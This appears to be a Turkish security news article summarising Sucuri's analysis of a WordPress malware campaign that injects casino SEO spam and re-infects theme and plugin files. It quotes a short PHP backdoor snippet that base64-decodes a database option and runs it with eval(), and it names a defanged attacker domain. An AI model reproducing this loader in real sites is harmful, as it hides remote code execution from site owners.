Siber suçlular, kötü amaçlı bağlantılar eklemek ve gelişmiş siyah şapkalı SEO taktikleri yoluyla arama motoru optimizasyonu sıralamalarını yükseltmek için web sitelerini giderek daha fazla hedef alıyor.
Bu kampanya öncelikli olarak, güvenliği ihlal edilmiş web sitelerini etkileyen en yaygın spam içeriği türü haline gelen çevrimiçi kumarhane spam’ına odaklanmaktadır.
Saldırganlar, özellikle kumarın sıkı bir şekilde düzenlendiği uluslararası pazarları hedefleyen çevrimiçi kumarhaneleri tanıtan spam içeriği eklemek için WordPress kurulumlarındaki güvenlik açıklarından yararlanır.
Saldırganlar kalıcılığı korumak ve tespit edilmekten kaçınmak için birden fazla teknik kullanır. Aynı adlara sahip yinelenen dizinler oluşturarak meşru web sitesi sayfalarını ele geçirirler ve orijinal içeriği etkili bir şekilde spam dolu açılış sayfalarıyla değiştirirler.
Ziyaretçiler veya arama motorları sayfalara erişmeye çalıştığında, istenmeyen casino web sitelerine bağlantılar içeren sahte dizinlere yönlendirilirler.
Bu teknik, Apache ve Nginx web sunucularının, istekleri WordPress yeniden yazma motorlarına iletmeden önce dosya sistemi yollarını nasıl çözdüğünü kullanır.
Sucuri güvenlik araştırmacıları, bu kötü amaçlı yazılımın çok sayıda artıklık katmanı içeren özellikle karmaşık bir versiyonunu tespit etti.
Kötü amaçlı kod, bir bileşen keşfedilse bile hayatta kalmayı sağlamak için hem tema hem de eklenti dosyalarına stratejik olarak yerleştirilir.
Bu gelişmiş sürüm, kolayca algılanabilen spam dizinleri oluşturmak yerine, yanıltıcı seçenek adlarını kullanarak yükünü WordPress veritabanında saklar.
Çok Katmanlı Enfeksiyon Mekanizması
Enfeksiyon, akıllı veritabanı manipülasyonu ve dinamik içerik getirme yoluyla çalışır.
Araştırmacılar, temanın Function.php dosyasının altına gömülü kötü amaçlı kod keşfettiler.
.webp)
Kod, wp_footers_logic seçenek adını kullanarak veritabanından base64 kodlu bir veri alır ve bunu PHP’nin eval() işlevi aracılığıyla yürütür: –
$cloak = get_option('wp_footers_logic');
if ($cloak) {
$decoded = base64_decode($cloak);
eval($decoded);
}eval() devre dışı bırakılırsa kötü amaçlı yazılım, yükü bir geri dönüş mekanizması olarak wp-content/cache/style.dat dosyasına yazar. Kodu çözülmüş veri, belirli URL yollarına yönelik gelen istekleri izleyerek önbelleğe alınmış spam içeriğini kontrol eder.
Tetiklendiğinde, saldırgan tarafından kontrol edilen alan adlarından (browsec gibi) içerik getirir.[.]xyz.xyz Kalıcılığı sağlamak için saldırganlar ek eklenti dosyalarına yeniden enfeksiyon kodu yerleştirir. Bu kod periyodik olarak ayırt edici belirteçleri arar.
İşaretleyiciler eksikse kod, kötü amaçlı yükü hem temanın function.php dosyasına hem de ilk aktif eklentinin birincil dosyasına otomatik olarak yeniden ekleyerek karmaşık SEO spam kampanyalarını gösterir.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
